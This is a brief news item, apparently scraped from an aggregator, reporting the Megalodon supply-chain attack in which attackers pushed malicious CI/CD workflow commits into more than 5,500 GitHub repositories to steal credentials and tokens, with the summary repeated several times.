Megalodon supply-chain attack hit more than 5,500 GitHub repositories.
Researchers disclosed a mass CI/CD attack called Megalodon, where attackers pushed 5,718 malicious commits into 5,561 GitHub repositories in about six hours. The malicious workflows were designed to steal cloud credentials, SSH keys, GitHub tokens, and OIDC tokens from build pipelines. The key lesson is that attackers increasingly target the pipeline rather than the application code itself.
Megalodon supply-chain attack hit more than 5,500 GitHub repositories.
24.05.2026
Megalodon supply-chain attack hit more than 5,500 GitHub repositories. Researchers disclosed a mass CI/CD attack called Megalodon, where attackers pushed 5,718 malicious commits into 5,561 GitHub repositories in about six hours. The malicious workflows were designed to steal…
Източник: www.stepsecurity.io